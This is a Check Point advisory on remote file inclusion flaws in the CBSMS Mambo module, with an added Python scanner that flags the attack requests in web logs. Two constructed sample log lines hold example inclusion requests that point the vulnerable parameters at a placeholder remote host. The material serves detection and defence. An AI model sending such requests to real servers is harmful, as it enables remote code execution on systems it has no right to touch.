Check Point Advisories

Update Protection against CBSMS Mambo Module Remote File Vulnerabilities

Check Point Reference: CPAI-2006-119
Date Published: 11 Oct 2006
Severity: Medium
Last Updated: Thursday 03 May, 2007
Source: FrSIRT/ADV-2006-2528
Industry Reference: CVE-2006-3302, CVE-2006-3294
Protection Provided by:
Who is Vulnerable? CBSMS Mambo Module version 1.0 and prior
Vulnerability Description: CBSMS Module for Mambo, an Open Source Content Management System, is prone to multiple vulnerabilities. A remote attacker can exploit these vulnerabilities to execute arbitrary PHP code on an affected system.
Update/Patch Available: Apply patch:
http://forum.mamboserver.com/showthread.php?t=83001
Vulnerability Details: The vulnerabilities are due to input validation errors in the "mod_cbsms_messages.php" and "mod_cbsms.php" scripts. An attacker can exploit these flaws via URLs in the "mosC_a_path" and "mosConfig_absolute_path" parameters. By doing so, the attacker could include malicious scripts and execute arbitrary commands on the vulnerable system.
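
Added example, not part of the Check Point advisory: a web-log check for the requests described above. It flags hits on the two named scripts where either named parameter decodes to a URL; the combined log format, module path, hosts and sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter names are the ones named in the advisory.
SCRIPTS = {"mod_cbsms.php", "mod_cbsms_messages.php"}
PARAMS = {"mosc_a_path", "mosconfig_absolute_path"}
# A value starting with a URL scheme or a protocol-relative "//" points off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_uri):
    """Return the (param, decoded value) pairs that carry a remote URL, else []."""
    parts = urlsplit(request_uri)
    script = unquote(parts.path).rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return []
    hits = []
    # parse_qsl percent-decodes names and values, so encoded URLs are seen too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in PARAMS and REMOTE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Yield (line_number, hits) for each log line that matches."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits

# Constructed sample log lines (not from the advisory); hosts and paths are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2006:10:00:00 +0000] "GET /index.php?option=com_frontpage HTTP/1.1" 200 5120',
    '192.0.2.77 - - [11/Oct/2006:10:00:05 +0000] "GET /modules/mod_cbsms.php?mosC_a_path=http://host.invalid/a.txt%3F HTTP/1.1" 200 312',
    '192.0.2.77 - - [11/Oct/2006:10:00:09 +0000] "GET /modules/mod_cbsms_messages.php?mosConfig_absolute_path=%68ttp%3A%2F%2Fhost.invalid%2Fb HTTP/1.0" 200 298',
    '192.0.2.15 - - [11/Oct/2006:10:00:12 +0000] "GET /modules/mod_cbsms.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

The third sample line is percent-encoded, so a plain text search of the log for "=http://" would miss it; decoding the query string first catches it.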

Protection Overview
